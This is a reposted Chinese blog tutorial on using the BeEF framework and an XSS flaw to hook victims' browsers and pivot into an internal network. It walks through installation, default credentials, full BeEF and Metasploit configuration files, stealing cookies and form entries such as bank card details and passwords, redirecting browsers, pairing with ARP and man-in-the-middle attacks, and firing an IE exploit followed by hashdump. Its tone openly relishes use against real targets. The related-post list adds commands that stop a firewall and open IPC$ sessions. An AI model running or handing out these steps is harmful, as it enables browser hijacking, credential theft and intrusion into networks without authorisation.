内网渗透一:利用Xss漏洞进入内网

转载 2015年11月17日 23:49:53

0x01:科普

Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网,配合metasploit绝对是内网渗透一大杀器。

 0x02安装

Kali linux 系统默认未安装beef,需要自行安装。

?
1
2
apt-get update
apt-get install beef-xss

 

0x03入门

0x03.1启动

主目录:

/usr/share/beef-xss

?
1
2
cd /usr/share/beef-xss
./beef

 

t01287a4dec5cc49b91.png

t0178b9b1ea09d0e72b.png

127.0.0.1:3000/ui/pannel

账号密码

beef/beef

t01fac022bc1ad5e4aa.png

demos:Beef-Xss ip:3000/demos/butcher/index.html

测试两台主机网络通信是否正常:

t011e6491eb9aafbd00.png

访问Beef demo页面

t01dc43ebf9a8fb188b.png

demo页面嵌入了hook.js 访问->中招

0x04挂马:

在正常页面添加script标签,嵌入恶意脚本

 

加载中...

在实际渗透中(需要一个公网的IP),如何让受害者访问我们嵌有hook.js的页面呢?

 

网站反馈页面,举报页面案例:用Xss平台沦陷百度投诉中心后台

 

当然,这位同学用的是Xss平台,而不是beef,利用Beef的话,不仅能得到后台管理员的Cookie,再配合Metasploit,还能以管理员主机浏览器当做跳板,进入公司内网。

Online Browersers->右击->Use As Proxy

http://p5.qhimg.com/t0107cb7746a23e6d35.jpg

再配合ARP攻击,MITM中间人攻击,对内网内所有Http请求重定向基本...(这里露出一个你懂的WS笑容)

Beef后台检测到有主机上线(感觉好像当年玩的灰鸽子、上兴 =。= 囧)

t016bd52ff0f6e09d92.png

 通过浏览器,我们可以看到目标主机的很多信息:

浏览器信息:
名称
版本
Browser UA String
Browser Platform
Windows size
插件基本信息:
Flash
VBS脚本
Web Sock
Quick Time
...
Api信息
Cookie
操作系统信息
Date 时间日期
硬件信息
Cpu (32/64)
屏幕分辨率
是否支持触屏
 

And So On

用火狐浏览器测试

加载中...

t011909d221bef87b75.png

Beef功能模块组件

http://p6.qhimg.com/t013e83e9938073faa9.jpg

常用功能/模块

 

1 2 3 4 5 Browser:获取浏览器信息 --Hooked Domain -----Get Cookie 获取客户端Cookie信息 执行一次命令在右边显示Cookie; -----Get From Value 获取页面提交的表单信息:截获填写的银行卡信息、注册页面的用户名密码; -----Redirect Browser 浏览器重定向

 

t011ca9c6d662701d53.jpg

执行后,目标浏览器访问任何网站都将会被重定向到bobao.360.cn,实际渗透的时候在内网实施ARP攻击,将内网所有Http请求流量重定向到嵌入了Hook恶意脚本的页面...(在这里露出一个淫荡的笑容)

Chrome Extensions:
Debug:测试Http请求
Exploits:利用浏览器漏洞进行攻击
Host:获取受害者主机信息
Mtasploit:结合Metasploit进行渗透,这个也是本文的重点。
Network:进行Doser、ping、DNS枚举、端口扫描等等
Social Enhineering:社工模块

0x05与Metasploit联动

Beef配置文件

/usr/share/beef-xss

/config.yaml  

 

?
1
2
metasploit:
enable: false

改成 

?
1
2
metasploit:
enable: true
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
    version: '0.4.4.5-alpha'
    debug: false
    restrictions:
        # subnet of browser ip addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
        # subnet of browser ip addresses that can connect to the UI
        # permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
        # It's not advised to decrease it with tons of hooked browsers (more than 50),
        # because it might impact performance. Also, enable WebSockets is generally better.
        xhr_poll_timeout: 5000
        # if running behind a nat set the public ip address here
        #public: ""
        #public_port: "" # port setting is experimental
        # DNS
        dns_host: "localhost"
        dns_port: 53
        panel_path: "/ui/panel"
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"
        # Allow one or multiple domains to access the RESTful API using CORS
        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"
        # Prefer WebSockets over XHR-polling when possible.
        websocket:
          enable: false
          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
          port: 61985 # WS: good success rate through proxies
          secure_port: 61986 # WSSecure
          ws_poll_timeout: 1000 # poll BeEF every second
        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" #supported: apache, iis
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"
    database:
        # For information on using other databases please read the
        # README.databases file
        # supported DBs: sqlite, mysql, postgres
        # NOTE: you must change the Gemfile adding a gem require line like:
        #   gem "dm-postgres-adapter"
        # or
        #   gem "dm-mysql-adapter"
        # if you want to switch drivers from sqlite to postgres (or mysql).
        # Finally, run a 'bundle install' command and start BeEF.
        driver: "sqlite"
        # db_file is only used for sqlite
        db_file: "db/beef.db"
        # db connection information is only used for mysql/postgres
        db_host: "localhost"
        db_port: 5432
        db_name: "beef"
        db_user: "beef"
        db_passwd: "beef123"
        db_encoding: "UTF-8"
    # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
    credentials:
        user:   "beef"
        passwd: "beef"
    # Autorun modules as soon the browser is hooked.
    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
    autorun:
        enable: true
        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
        allow_user_notify: true
    crypto_default_value_length: 80
    # Enable client-side debugging
    client:
        debug: false
    # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
        metasploit:
            enable: true
        social_engineering:
            enable: true
        evasion:
            enable: false
        console:
             shell:
                enable: false
        ipec:
            enable: true
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "172.16.244.129"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            ssl: false
            ssl_version: 'SSLv3'
            ssl_verify: true
            callback_host: "172.16.244.129"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [
              {os: 'osx', path: '/opt/local/msf/'},
              {os: 'livecd', path: '/opt/metasploit-framework/'},
              {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
              {os: 'bt5', path: '/opt/framework3/msf3/'},
              {os: 'backbox', path: '/opt/metasploit3/msf3/'},
              {os: 'win', path: 'c:\\metasploit-framework\\'},
              {os: 'custom', path: '/usr/share/metasploit-framework/'}
            ]

 

修改 host callback_host两参数,改为beef主机IP

重启postgresq、metasploit、服务

service postgresql restart & service metasploit restart

 

t019e7cd4b2aa99d854.jpg

msfconsole #启动Metasploit 1 load msgrpc ServerHost=172.16.244.129 Pass=abc123

 

t0169debf48fbc3942a.jpg

重启Beef

t0190d651f583e54f3b.jpg

启动beef这里提示已经载入246个metasploit的EXP,MSF更新到最新版应该有五六百个EXP

进入Beef后台(莫名成了245 =。=!)

t01d5aa2f783869c7f9.jpg

use exploit/windows/browser/ie_execcommand_uaf
show options
set srvhost 172.16.244.129
exploit/run

t01418a1cdbd8c6e6a1.jpg

t01560b8713b2414391.jpg

 

靶机被强行跳转到被监听的URL

t0165e1ff04e684fc88.jpg

MSF成功监听到(但,貌似是虚拟机装的XP把这个漏洞补了,所以没产生session会话)

t01fcc6b6cff8f19f8c.jpg

如果XP没有打补丁,即存在这个EXP针对的漏洞,这里会产生一个session会话

session -i 1

t01645e28238ba42595.jpg

screenshot 截屏:截取遭钓鱼主机的屏幕到本地文件

sysinfo 查看系统信息

hashdump dump目标主机的用户Hash

内网渗透一:利用Xss漏洞进入内网

0x01:科普 Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的...
  • xysoul
  • xysoul
  • 2015年05月02日 14:59
  • 2447

内网渗透一:利用Xss漏洞进入内网

内网渗透一:利用Xss漏洞进入内网  0x01:科普 Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Pro...
  • tom9238
  • tom9238
  • 2016年03月21日 18:52
  • 279

公司内部服务器的一个小漏洞,让我越过VPN限制控制公司整个内网

故事背景一: 几个月以前,公司一个客户的网站要与第三方合作伙伴增加一个数据接口,于是就让系统集成的同事给我们的测试环境开一个外网IP方便第三方远程调用我们的接口。 接口调完后,这个外网端口一直都没关闭...

内网渗透二:meterpreter的一些利用

0x01填坑: 我在这里填一下上一篇文章中的坑哈: 我们使用了exploit/windows/browser/ie_execcommand_uaf IE浏览器的这个EXP,但是执行之后发现...
  • xysoul
  • xysoul
  • 2015年05月02日 15:01
  • 902

内网渗透思路整理与工具使用

  • 2017年12月08日 14:55
  • 1.12MB
  • 下载

内网渗透之常见命令

  • 2014年03月14日 11:09
  • 7KB
  • 下载

内网渗透之IPC,远程执行

开启服务 net start Schedule net start wmiApSrv 关闭防火墙 net stop sharedaccess net use \\目标IP\ipc$ "" ...
  • h4ck0ne
  • h4ck0ne
  • 2016年01月23日 17:48
  • 3426

记一次蛋疼渗透内网某机器 20160802

0x00 起因 某天:男朋友发来了他School的shell叫内网渗透2333 ps;一般jsp的shell不是system权限就是administrator权限这是因为管理员对tom...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:内网渗透一:利用Xss漏洞进入内网
举报原因:
原因补充:

(最多只允许输入30个字)